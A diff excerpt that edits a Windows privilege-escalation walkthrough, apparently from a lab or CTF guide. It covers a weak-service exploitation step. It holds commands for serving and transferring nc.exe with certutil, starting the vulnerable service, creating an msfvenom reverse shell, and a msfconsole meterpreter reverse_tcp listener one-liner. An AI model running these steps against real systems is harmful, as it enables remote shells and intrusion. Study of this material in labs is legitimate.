Skip to content

 python3 -m http.server 8000

-NOTE: Kali has a builtin copy of nc.exe located in the /usr/share/windows-resources/binaries/ directory.
+Note: Kali has a built-in copy of nc.exe located in /usr/share/windows-resources/binaries/.

-2. Transfer the script to the target machine using certutil:
+2. Transfer the binary to the target machine using certutil:

 sc start daclsvc

-1. Alternatively, we can use msfvenom to create a reverse shell payload
+1. Generate a reverse shell payload with msfvenom:

-2. Start your listener on the attacking machine
+2. Start a listener on the attacking machine with Metasploit:

 msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"